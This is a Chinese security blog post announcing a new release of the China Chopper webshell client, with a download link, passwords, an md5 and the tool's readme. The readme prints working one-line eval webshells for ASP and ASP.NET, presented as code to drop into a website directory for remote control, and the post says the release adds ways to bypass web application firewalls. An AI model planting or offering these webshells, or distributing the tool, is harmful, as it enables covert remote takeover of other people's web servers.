p0's blog | 破 关注网络安全
最新菜刀发布-20160620(已对比md5)
发表于: | 分类: 安全工具 | 评论:4 | 阅读: 2885

QQ截图20160627174446.png

新版增加了很多waf绕过姿势

链接:http://pan.baidu.com/s/1gfbh8QZ 密码:e9hr

解压密码 www.maicaidao.com

md5:20160622 - acaf6564637ba97f73297b0096c2994c

一、网站管理模块

放在网站上的脚本程序分两种:

  1)“一句话(Eval)”:
PHP, ASP, ASP.NET 的网站都可以,支持https。下面的代码放在网站目录即可开始管理,比FTP好用多了是不是:
   PHP:
   ASP: <%eval request("caidao")%>
   ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["caidao"],"unsafe");%>

2)自己开发的脚本程序(Customize):
理论上支持所有动态脚本,只要正确与菜刀进行交互即可。调用方法请参阅后面的 “Customize模式菜刀和服务端通信接口”。

二、文件说明:

caidao.exe 菜刀程序
db.mdb 菜刀的主数据库
caidao.conf 配置文件(重要,千万别删除)


cache.tmp 菜刀的缓存数据库(可删除)
readme.txt 你现在正在看的(可删除)
ip.dat 一个IP库,用于IP地址识别(可删除)
菜刀的自写脚本目录(可删除)
Customize模式的服务端(可删除)
Customize.aspx 这是一个C#的示例服务端(全功能)
Customize.jsp 这是一个jsp的示例服务端(全功能)
Customize.cfm 这是一个cfm的示例服务端(文件管理,虚拟终端)


著作权归作者所有。
商业转载请联系作者获得授权,非商业转载请注明出处。
作者:p0
链接:http://p0sec.net/index.php/archives/21/
来源:http://p0sec.net/

已有 4 条评论

  1. null null

    Google 了半天,终于找到一个原版下载地址,十分感谢!

  2. test test

    链接:http://pan.baidu.com/s/1gfbh8QZ 密码:e9hr 密码错误啊

    1. p0 p0

      没错啊,请检查一下是否输入错误

  3. test test

    标题和内容不符......

添加新评论

TOP